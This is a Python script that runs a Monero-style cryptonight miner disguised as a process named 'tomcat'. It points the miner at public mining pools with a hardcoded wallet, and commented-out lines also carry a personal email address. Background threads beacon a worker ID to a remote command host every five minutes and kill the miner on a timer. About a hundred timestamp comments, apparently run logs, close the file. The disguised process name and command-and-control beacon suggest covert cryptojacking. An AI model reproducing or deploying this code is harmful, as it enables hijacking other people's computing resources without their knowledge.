import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:08.256458
#2018-02-17 17:19:04.816245
#2018-02-17 19:07:05.361969
#2018-02-17 20:54:05.420312
#2018-02-17 22:41:09.213990
#2018-02-18 00:25:06.730987
#2018-02-18 02:15:09.104726
#2018-02-18 04:04:04.919055
#2018-02-18 05:54:04.356645
#2018-02-18 07:45:01.461179
#2018-02-18 09:32:04.060619
#2018-02-18 11:18:07.898777
#2018-02-18 13:04:07.906235
#2018-02-18 14:53:04.410789
#2018-02-18 16:40:06.753520
#2018-02-18 18:29:07.023784
#2018-02-18 20:17:05.083641
#2018-02-18 22:02:06.217231
#2018-02-18 23:50:07.599951
#2018-02-19 01:37:02.150080
#2018-02-19 03:25:04.095702
#2018-02-19 05:10:05.628331
#2018-02-19 06:55:03.824551
#2018-02-19 08:43:05.979820
#2018-02-19 10:32:02.139660
#2018-02-19 12:20:10.194536
#2018-02-19 14:08:04.865627
#2018-02-19 15:57:01.489640
#2018-02-19 17:44:10.375075
#2018-02-19 19:32:06.887009
#2018-02-19 21:21:02.203297
#2018-02-19 23:07:01.696909
#2018-02-20 00:51:04.988915
#2018-02-20 02:41:01.923154
#2018-02-20 04:29:05.936796
#2018-02-20 06:12:07.808379
#2018-02-20 07:57:03.958196
#2018-02-20 09:42:08.052573
#2018-02-20 11:26:06.041611
#2018-02-20 13:12:05.329459
#2018-02-20 14:57:05.690593
#2018-02-20 16:42:11.183348
#2018-02-20 18:29:09.296760
#2018-02-20 20:21:01.326600
#2018-02-20 22:06:02.196482
#2018-02-20 23:48:05.631851
#2018-02-21 01:34:05.430692
#2018-02-21 03:21:07.628704
#2018-02-21 05:08:07.083741
#2018-02-21 06:56:19.445255
#2018-02-21 08:43:07.943190
#2018-02-21 10:28:07.144295
#2018-02-21 12:17:07.958143
#2018-02-21 14:07:06.361100
#2018-02-21 15:54:04.905602
#2018-02-21 17:46:05.724456
#2018-02-21 19:33:08.115286
#2018-02-21 21:21:08.728405
#2018-02-21 23:09:05.269811
#2018-02-22 00:59:06.802356
#2018-02-22 02:48:06.826096
#2018-02-22 04:34:05.057923
#2018-02-22 06:19:04.959120
#2018-02-22 08:06:02.195118
#2018-02-22 09:53:04.762909
#2018-02-22 11:37:07.296860
#2018-02-22 13:26:01.931183
#2018-02-22 15:14:09.062615
#2018-02-22 16:58:08.923253
#2018-02-22 18:47:07.660143
#2018-02-22 20:39:05.514351
#2018-02-22 22:24:04.838911
#2018-02-23 00:11:08.277511
#2018-02-23 01:59:06.452795
#2018-02-23 03:46:06.293521
#2018-02-23 05:36:07.246383
#2018-02-23 07:21:06.197477
#2018-02-23 09:25:06.082701
#2018-02-23 11:32:06.031157
#2018-02-23 13:23:04.786549
#2018-02-23 15:09:05.232191
#2018-02-23 16:58:07.961531
#2018-02-23 19:01:19.530944
#2018-02-23 20:47:07.822224
#2018-02-23 22:35:05.969970
#2018-02-24 00:22:02.023525
#2018-02-24 02:14:05.407197
#2018-02-24 04:04:02.067849
#2018-02-24 05:49:04.187820
#2018-02-24 07:36:01.719586
#2018-02-24 09:21:08.080584
#2018-02-24 11:15:08.546680
#2018-02-24 13:05:04.102064
#2018-02-24 14:53:05.176881
#2018-02-24 16:43:06.946584
#2018-02-24 18:31:05.353391
#2018-02-24 20:18:03.691842
#2018-02-24 22:11:02.052672
#2018-02-25 01:08:01.331888
#2018-02-25 04:38:07.381718
#2018-02-25 08:04:05.120641